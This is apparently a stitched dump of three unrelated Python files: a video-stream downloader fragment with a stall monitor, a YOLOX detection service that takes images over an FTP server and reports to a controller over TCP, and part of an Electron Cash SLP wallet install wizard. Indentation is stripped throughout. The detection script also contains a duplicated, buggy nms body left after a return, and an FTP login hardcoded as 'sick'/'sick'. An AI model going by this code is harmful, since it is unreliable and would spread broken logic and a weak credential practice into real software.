# fd = stream.open()
try:
with self.stream.open() as fd:
with open(self.ydl_opts['outtmpl'] + '.part', 'wb') as file:
for f in fd:
file.write(f)
if self.flag.is_set():
# self.flag.clear()
return 1
return 0
except OSError:
self.rename(self.ydl_opts['outtmpl'])
raise
# ffmpeg.exe -i http://vfile1.grtn.cn/2018/1542/0254/3368/154202543368.ssm/154202543368.m3u8
# -c copy -bsf:a aac_adtstoasc -movflags +faststart output.mp4
class FFmpegdl(DownloadBase):
def download(self):
args = ['ffmpeg', '-y', '-i', self.ydl_opts['absurl'], '-c', 'copy', '-f', self.suffix,
self.ydl_opts['outtmpl'] + '.part']
proc = subprocess.Popen(args, stdin=subprocess.PIPE)
try:
retval = proc.wait()
except KeyboardInterrupt:
if sys.platform != 'win32':
proc.communicate(b'q')
raise
return retval
class BatchCheckBase:
def __init__(self, pattern_id, urls):
self.usr_dict = {}
self.usr_list = []
self.pattern_id = pattern_id
for url in urls:
self.get_id(url)
def get_id(self, url):
m = re.match(self.pattern_id, url)
if m:
usr_id = m.group('id')
self.usr_dict[usr_id.lower()] = url
self.usr_list.append(usr_id)
def check(self):
pass
class Monitoring(Timer):
def __init__(self, parent_pid, file_name):
super().__init__(func=self.kill_child_processes)
self.parent = self.children = self.numc = None
self.parent_pid = parent_pid
self.file_name = file_name + '.part'
self.last_file_size = 0.0
self.flag = Event()
def terminate(self):
if self.numc == 0:
logger.error("ChildrenProcess doesn't exist")
else:
for process in self.children:
process.terminate()
        # logger.info('Download stalled: ' + self.file_name)
def get_process(self, parent_pid):
try:
parent = psutil.Process(parent_pid)
except psutil.NoSuchProcess:
self.stop()
logger.error("Process doesn't exist")
return
children = parent.children(recursive=True)
numc = len(children)
return parent, children, numc
def kill_child_processes(self):
file_size = os.path.getsize(self.file_name) / 1024 / 1024 / 1024
if file_size <= self.last_file_size:
            logger.error('Download stalled: ' + self.file_name)
if self.numc == 0:
self.parent.terminate()
else:
self.terminate()
time.sleep(1)
if os.path.isfile(self.file_name):
                logger.info('The stalled download process may not have exited successfully')
return
else:
self.stop()
                logger.info('The stalled download process exited successfully')
return
self.last_file_size = file_size
if file_size >= 2.5:
if self.numc == 0:
self.flag.set()
else:
self.terminate()
            logger.info('Starting a new download segment: ' + self.file_name)
def __timer(self):
        logger.info('Got pid {0}, file {1}'.format(self.parent_pid, self.file_name))
retry = 0
while not self._flag.wait(self.interval):
self.parent, self.children, self.numc = self.get_process(self.parent_pid)
if os.path.isfile(self.file_name):
self._func(*self._args, **self._kwargs)
else:
                logger.info('%s does not exist' % self.file_name)
if retry >= 2:
self.terminate()
                    logger.info('Terminating process; %s not found' % self.file_name)
return
retry += 1
        # logger.info('Monitor thread for <%s> exited' % self.file_name)
def start(self):
try:
self.__timer()
finally:
            logger.info('Exiting monitor thread for <%s>' % self.file_name)
def match1(text, *patterns):
if len(patterns) == 1:
pattern = patterns[0]
match = re.search(pattern, text)
if match:
return match.group(1)
else:
return None
else:
ret = []
for pattern in patterns:
match = re.search(pattern, text)
if match:
ret.append(match.group(1))
return ret
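# Illustration (hypothetical strings): match1 returns the first capture group
# for a single pattern, or a list of first groups when several patterns match:
#     match1('roomid=1234&x=9', r'roomid=(\d+)')              -> '1234'
#     match1('roomid=1234&x=9', r'roomid=(\d+)', r'x=(\d+)')  -> ['1234', '9']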
|
sf_demo.py
|
import socket
from socket import *
from threading import Thread
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
import random
import argparse
import os
import time
from loguru import logger
import cv2
import numpy as np
import torch
from yolox.data.data_augment import ValTransform
from yolox.data.datasets import COCO_CLASSES
from yolox.exp import get_exp
from yolox.utils import fuse_model, get_model_info, postprocess, vis
IMAGE_EXT = [".jpg", ".jpeg", ".webp", ".bmp", ".png"]
logger.add('{time}.log', rotation='00:00',retention="10 days")
# Create a new user authorizer
authorizer = DummyAuthorizer()
# Register a username, password, home directory and permissions with it
if not os.path.exists("F:\\FTP Root\\ICR_EXT"):
os.mkdir("F:\\FTP Root\\ICR_EXT")
authorizer.add_user("sick", "sick", "F:\\FTP Root\\ICR_EXT", perm="elradfmw") # adfmw
handler = FTPHandler
handler.authorizer = authorizer
handler.passive_ports = range(5001, 5510)
controler_tcpCliSock = socket(AF_INET, SOCK_STREAM)
HOST_controler = '192.168.100.101' # The remote host
PORT_controler = 3500 # The same port as used by the server
# imagelist = queue.Queue()
def make_parser():
parser = argparse.ArgumentParser("YOLOX Demo!")
parser.add_argument(
"--demo", default="image", help="demo type, eg. image, video and webcam"
)
parser.add_argument("-expn", "--experiment-name", type=str, default=None)
parser.add_argument("-n", "--name", type=str, default="yolox-s", help="model name")
parser.add_argument(
"--path", default="./assets/dog.jpg", help="path to images or video"
)
parser.add_argument("--camid", type=int, default=0, help="webcam demo camera id")
parser.add_argument(
"--save_result",
action="store_true",
help="whether to save the inference result of image/video",
)
# exp file
parser.add_argument(
"-f",
"--exp_file",
default=None,
type=str,
help="pls input your experiment description file",
)
parser.add_argument("-c", "--ckpt", default="best_ckpt.pth", type=str, help="ckpt for eval")
parser.add_argument(
"--device",
default="gpu",
type=str,
help="device to run our model, can either be cpu or gpu",
)
parser.add_argument("--conf", default=0.85, type=float, help="test conf")
parser.add_argument("--nms", default=0.45, type=float, help="test nms threshold")
parser.add_argument("--tsize", default=640, type=int, help="test img size")
parser.add_argument(
"--fp16",
dest="fp16",
default=False,
action="store_true",
help="Adopting mix precision evaluating.",
)
parser.add_argument(
"--legacy",
dest="legacy",
default=False,
action="store_true",
help="To be compatible with older versions",
)
parser.add_argument(
"--fuse",
dest="fuse",
default=False,
action="store_true",
help="Fuse conv and bn for testing.",
)
parser.add_argument(
"--trt",
dest="trt",
default=False,
action="store_true",
help="Using TensorRT model for testing.",
)
return parser
def image_demo(predictor, vis_folder, path, current_time, save_result):
img_path = handler.imagelist.get()
time.sleep(0.01)
t1 = time.time()
outputs, img_info = predictor.inference(img_path)
# result_image = predictor.visual(outputs[0], img_info, predictor.confthre)
t2 = time.time()
ms = (t2 - t1) * 1000.0 / 1
logger.info("predict image_name: {} ".format(img_info['file_name']))
logger.info("predict time: {} ms one image".format(ms))
#print("predict time: {} ms per batch image".format(ms))
Track_id=img_info['file_name'].split('_')[6]
label=1
if len(outputs)>0:
if outputs[0] is not None :
if outputs[0].shape[0]>1:
picked_boxes= nms(outputs[0])
if len(picked_boxes)>1:
label = 2
output=outputs[0]
bboxes=output[:,0:4]
cls=output[:,6]
scores=output[:,4]*output[:,5]
logger.info("predict bboxes: {} ".format(bboxes))
logger.info("predict scores: {} ".format(scores))
logger.info("predict result: {} ".format(label))
send_out='\u0002'+str(Track_id)+';'+str(label)+'\u0003'
controler_tcpCliSock.send(bytes(send_out, 'utf8'))
# save_file_name = img_path.split("_EEEEEEEEEEEE_")[-1]
# img_path="F:/my_code/2021/sf/1027/"+save_file_name
# # print("img_name:{}".format(save_file_name))
# # logger.info("Saving detection result in {}".format(save_file_name))
# cv2.imwrite(img_path, result_image)
# return result_image
def nms(bboxes):
"""非极大抑制过程
:param bboxes: 同类别候选框坐标
:return:
"""
bboxes = np.array(bboxes.cpu())
    # Pull out the corner coordinates of the n boxes
x1 = bboxes[:, 0]
y1 = bboxes[:, 1]
x2 = bboxes[:, 2]
y2 = bboxes[:, 3]
scores = bboxes[:, 4] * bboxes[:, 5]
    # 2. Filter the candidate boxes with NMS
    # Sort scores from large to small and take the indices
order = scores.argsort()[::-1]
areas = (x2 - x1) * (y2 - y1)
    # 2. Filter the candidate boxes with NMS
    # Coordinates and scores of the boxes to return
picked_boxes = []
while order.size > 0:
        # Add the box with the current highest confidence to the result list
index = order[-1]
picked_boxes.append(bboxes[index])
        # Intersection of the current highest-confidence box with every other candidate
x11 = np.maximum(x1[index], x1[order[:-1]])
y11 = np.maximum(y1[index], y1[order[:-1]])
x22 = np.minimum(x2[index], x2[order[:-1]])
y22 = np.minimum(y2[index], y2[order[:-1]])
        # Ratio of the current box area to the areas of the remaining boxes
rate = areas[index] / areas[order[:-1]]
        # Ratio of the remaining box areas to the current box area
rate1 = areas[order[:-1]] / areas[index]
w = np.maximum(0.0, x22 - x11)
h = np.maximum(0.0, y22 - y11)
intersection = w * h
        # Compute IoU from the intersection area and the two box areas; keep boxes above the threshold
ratio = intersection / (areas[index] + areas[order[:-1]] - intersection)
        # rate == ratio indicates containment; keep only boxes that are not contained
keep_boxes_indics = np.where(abs(ratio - rate)>0.01)
keep_boxes_indics1 = np.where(abs(ratio - rate1)>0.01)
if keep_boxes_indics[0].__len__() < keep_boxes_indics1[0].__len__():
order = order[keep_boxes_indics]
else:
order = order[keep_boxes_indics1]
return picked_boxes
"""非极大抑制过程
:param bboxes: 同类别候选框坐标
:return:
"""
bboxes = np.array(bboxes.cpu())
# 取出n个的极坐标点
x1 = bboxes[:, 0]
y1 = bboxes[:, 1]
x2 = bboxes[:, 2]
y2 = bboxes[:, 3]
# 2、对候选框进行NMS筛选
# 返回的框坐标和分数
picked_boxes = []
# 对置信度进行排序, 获取排序后的下标序号, argsort默认从小到大排序
order = np.argsort(np.ones(len(bboxes)))
areas = (x2 - x1) * (y2 - y1)
while order.size > 1:
# 将当前置信度最大的框加入返回值列表中
index = order[-1]
picked_boxes.append(bboxes[index])
# 获取当前置信度最大的候选框与其他任意候选框的相交面积
x11 = np.maximum(x1[index], x1[order[:-1]])
y11 = np.maximum(y1[index], y1[order[:-1]])
x22 = np.minimum(x2[index], x2[order[:-1]])
y22 = np.minimum(y2[index], y2[order[:-1]])
# 计算当前矩形框与其余框的比值
rate = areas[index] / areas[order[:-1]]
# 计算其余框于u当前框的比值
rate1 = areas[order[:-1]] / areas[index]
w = np.maximum(0.0, x22 - x11)
h = np.maximum(0.0, y22 - y11)
intersection = w * h
# 利用相交的面积和两个框自身的面积计算框的交并比, 保留大于阈值的框
ratio = intersection / (areas[index] + areas[order[:-1]] - intersection)
# rate==ratio表示包含关系,保留不为包含关系的框
keep_boxes_indics = np.where(ratio != rate)
keep_boxes_indics1 = np.where(ratio != rate1)
if keep_boxes_indics.__len__() < keep_boxes_indics1.__len__():
order = order[keep_boxes_indics]
else:
order = order[keep_boxes_indics1]
return picked_boxes
class Predictor(object):
def __init__(
self,
model,
exp,
cls_names=COCO_CLASSES,
trt_file=None,
decoder=None,
device="cpu",
fp16=False,
legacy=False,
):
self.model = model
self.cls_names = cls_names
self.decoder = decoder
self.num_classes = exp.num_classes
self.confthre = exp.test_conf
self.nmsthre = exp.nmsthre
self.test_size = exp.test_size
self.device = device
self.fp16 = fp16
self.preproc = ValTransform(legacy=legacy)
if trt_file is not None:
from torch2trt import TRTModule
model_trt = TRTModule()
model_trt.load_state_dict(torch.load(trt_file))
x = torch.ones(1, 3, exp.test_size[0], exp.test_size[1]).cuda()
self.model(x)
self.model = model_trt
def inference(self, img):
img_info = {"id": 0}
if isinstance(img, str):
img_info["file_name"] = os.path.basename(img)
img = cv2.imread(img)
else:
img_info["file_name"] = None
height, width = img.shape[:2]
img_info["height"] = height
img_info["width"] = width
img_info["raw_img"] = img
ratio = min(self.test_size[0] / img.shape[0], self.test_size[1] / img.shape[1])
img_info["ratio"] = ratio
img, _ = self.preproc(img, None, self.test_size)
img = torch.from_numpy(img).unsqueeze(0)
img = img.float()
if self.device == "gpu":
img = img.cuda()
if self.fp16:
img = img.half() # to FP16
with torch.no_grad():
t0 = time.time()
outputs = self.model(img)
if self.decoder is not None:
outputs = self.decoder(outputs, dtype=outputs.type())
outputs = postprocess(
outputs, self.num_classes, self.confthre,
self.nmsthre, class_agnostic=True
)
logger.info("Infer time: {:.4f}s".format(time.time() - t0))
return outputs, img_info
def visual(self, output, img_info, cls_conf=0.35):
ratio = img_info["ratio"]
img = img_info["raw_img"]
if output is None:
return img
output = output.cpu()
bboxes = output[:, 0:4]
# preprocessing: resize
bboxes /= ratio
cls = output[:, 6]
scores = output[:, 4] * output[:, 5]
vis_res = vis(img, bboxes, scores, cls, cls_conf, self.cls_names)
return vis_res
def main(exp, args):
if not args.experiment_name:
args.experiment_name = exp.exp_name
file_name = os.path.join(exp.output_dir, args.experiment_name)
os.makedirs(file_name, exist_ok=True)
vis_folder = None
if args.save_result:
vis_folder = os.path.join(file_name, "vis_res")
os.makedirs(vis_folder, exist_ok=True)
if args.trt:
args.device = "gpu"
logger.info("Args: {}".format(args))
if args.conf is not None:
exp.test_conf = args.conf
if args.nms is not None:
exp.nmsthre = args.nms
if args.tsize is not None:
exp.test_size = (args.tsize, args.tsize)
model = exp.get_model()
logger.info("Model Summary: {}".format(get_model_info(model, exp.test_size)))
if args.device == "gpu":
model.cuda()
if args.fp16:
model.half() # to FP16
model.eval()
if not args.trt:
if args.ckpt is None:
ckpt_file = os.path.join(file_name, "best_ckpt.pth")
else:
ckpt_file = args.ckpt
logger.info("loading checkpoint")
ckpt = torch.load(ckpt_file, map_location="cpu")
# load the model state dict
model.load_state_dict(ckpt["model"])
logger.info("loaded checkpoint done.")
if args.fuse:
logger.info("\tFusing model...")
model = fuse_model(model)
if args.trt:
        assert not args.fuse, "TensorRT model does not support model fusing!"
trt_file = os.path.join(file_name, "model_trt.pth")
assert os.path.exists(
trt_file
), "TensorRT model is not found!\n Run python3 tools/trt.py first!"
model.head.decode_in_inference = False
decoder = model.head.decode_outputs
logger.info("Using TensorRT to inference")
else:
trt_file = None
decoder = None
predictor = Predictor(model, exp, COCO_CLASSES, trt_file, decoder, args.device, args.fp16, args.legacy)
current_time = time.localtime()
while True:
if handler.imagelist.qsize() > 0:
# result_image=image_demo(predictor, vis_folder, args.path, current_time, args.save_result)
try:
image_demo(predictor, vis_folder, args.path, current_time, args.save_result)
except Exception:
#logger.error("Exception :{}").format(Exception)
continue
# cv2.imshow("show", result_image)
# cv2.waitKey(1)
else:
time.sleep(0.0001)
continue
# def socket_threading():
# while True:
# conn, addr = s.accept()
# print("连接地址:", addr)
# client_list.append(conn)
# while True:
# try:
# data = conn.recv(1024) # 接收数据
# if len(data) == 0:
# client_list.remove(conn)
# break
    # print('receive:', data.decode())  # print the received data
# s_data = str(data, encoding="utf-8")
# imagelist.put(s_data)
# # conn.send(data.upper()) # 然后再发送数据
# except ConnectionResetError as e:
# client_list.remove(conn)
    # print('Closed a connection that was in use!')
# break
# conn.close()
def FTP_threading():
    # Start the FTP server
server = FTPServer(("0.0.0.0", 6000), handler)
server.serve_forever()
def start_controler_Client():
BUFSIZE = 1024
ADDR = (HOST_controler, PORT_controler)
global controler_tcpCliSock
global controler_connected
while True:
controler_tcpCliSock = socket(AF_INET, SOCK_STREAM)
port = random.randint(11560, 11569)
controler_tcpCliSock.settimeout(0.030)
try:
controler_tcpCliSock.bind(('0.0.0.0', port))
except Exception as e:
print(e)
time.sleep(3)
continue
while True:
try:
controler_tcpCliSock.connect(ADDR)
controler_connected = True
except Exception as e:
print(e)
time.sleep(5)
continue
print("connectted to control..")
break
# break
while controler_connected:
try:
data = controler_tcpCliSock.recv(BUFSIZE).decode()
print("controler :" + data)
if len(data) == 0:
controler_tcpCliSock.close()
controler_tcpCliSock = socket(AF_INET, SOCK_STREAM)
print('Controler disconnected......')
break
except Exception as e:
# print(e)
pass
if controler_connected == False:
controler_tcpCliSock.close()
print('Controler disconnected......')
# logger.warning('Controler disconnected......')
if __name__ == '__main__':
# s = socket()
# s.bind(("127.0.0.1", 2114))
# s.listen(-1)
#
# client_list = []
# thread1 = Thread(target=socket_threading)
# thread1.start()
thread2 = Thread(target=FTP_threading)
thread2.start()
thread3 = Thread(target=start_controler_Client)
thread3.start()
args = make_parser().parse_args()
exp = get_exp(args.exp_file, args.name)
main(exp, args)
|
installwizard.py
|
# -*- mode: python3 -*-
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electroncash import Wallet, WalletStorage
from electroncash.util import UserCancelled, InvalidPassword, finalization_print_error
from electroncash.base_wizard import BaseWizard
from electroncash.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PW_NEW
from .bip38_importer import Bip38Importer
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Electron Cash is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Bitcoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #{}:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16 * 360 * i / self.n)
alpha2 = int(16 * 360 * 1 / self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
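# Decorator for InstallWizard dialog methods: it relabels the Back button as
# "Cancel" on the first screen, turns GoBack into a back-navigation (or closes
# the wizard when there is nothing to go back to), swallows UserCancelled, and
# feeds the wrapped method's return value(s) into the run_next callback.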
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage, partial_title='Install Wizard'):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electron Cash SLP Edition - ' + _(partial_title))
self.app = app
self.config = config
# Set for the base class
self.plugins = plugins
self.setMinimumSize(600, 450)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electron-cash.svg')
self.show()
self.raise_()
# Track object lifecycle
finalization_print_error(self)
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(QLineEdit.Password)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
logo = QLabel()
logo.setPixmap(QPixmap(":icons/slp_logo_hollow.png").scaledToWidth(52))
logo.setMaximumWidth(52)
vbox.addWidget(QLabel(_("<hr><b>NOTE: This version of Electron Cash is SLP token aware.</b>")))
vbox.addWidget(logo)
vbox.addWidget(QLabel(_("New wallets SLP use m/44'/245'/0' as the address derivation path.") + '\n' \
+ _("Funds will not be accessible with non-SLP versions of Electron Cash.")))
vbox.addWidget(QLabel(_("To avoid losing SLP tokens, you should avoid opening a wallet on") + '\n' \
+ _("wallet software not aware of SLP tokens.")))
vbox.addWidget(QLabel(_("For more information visit: <a href=\"https://SimpleLedger.cash\">https://SimpleLedger.cash</a>")))
self.set_layout(vbox, title=_('Electron Cash SLP wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except IOError:
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this SLP wallet, or choose another file.")
pw = False
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = _("This file is encrypted.") + '\n' + _('Enter your password or choose another file.')
pw = True
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.hide()
msg = _("The format of your wallet '%s' must be upgraded for Electron Cash. This change will not be backward compatible"%path)
if not self.question(msg):
return
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QIcon(filename).pixmap(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options, can_skip=None):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self, can_skip=can_skip)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext, slayout.was_skipped
def bip38_prompt_for_pw(self, bip38_keys):
''' Reimplemented from basewizard superclass. Expected to return the pw
dict or None. '''
d = Bip38Importer(bip38_keys, parent=self.top_level_window())
res = d.exec_()
d.setParent(None) # python GC quicker if this happens
return d.decoded_keys # dict will be empty if user cancelled
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)[:3]
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext, was_skipped = self.seed_input(title, message, test, options=None, can_skip=True)
return seed, was_skipped
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password. Note that this dialog screen
cannot go back, and instead the user can only cancel."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def _add_extra_button_to_layout(self, extra_button, layout):
if (not isinstance(extra_button, (list, tuple))
or not len(extra_button) == 2):
return
but_title, but_action = extra_button
hbox = QHBoxLayout()
hbox.setContentsMargins(12,24,12,12)
but = QPushButton(but_title)
hbox.addStretch(1)
hbox.addWidget(but)
layout.addLayout(hbox)
but.clicked.connect(but_action)
@wizard_dialog
def confirm_dialog(self, title, message, run_next, extra_button=None):
self.confirm(message, title, extra_button=extra_button)
def confirm(self, message, title, extra_button=None):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
if extra_button:
self._add_extra_button_to_layout(extra_button, vbox)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next, extra_button=None, *, disabled_indices=set(), disabled_tooltip=''):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
non_disabled = [i for i,v in enumerate(c_titles) if i not in disabled_indices]
if non_disabled:
# if there are any non-disabled items, make the first one pre-selected
checked_index = non_disabled[0]
else:
# otherwise ensure nothing is pre-selected
checked_index = -1
clayout = ChoicesLayout(message, c_titles, checked_index = checked_index,
disabled_indices = disabled_indices,
disabled_tooltip = disabled_tooltip)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
if extra_button:
self._add_extra_button_to_layout(extra_button, vbox)
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
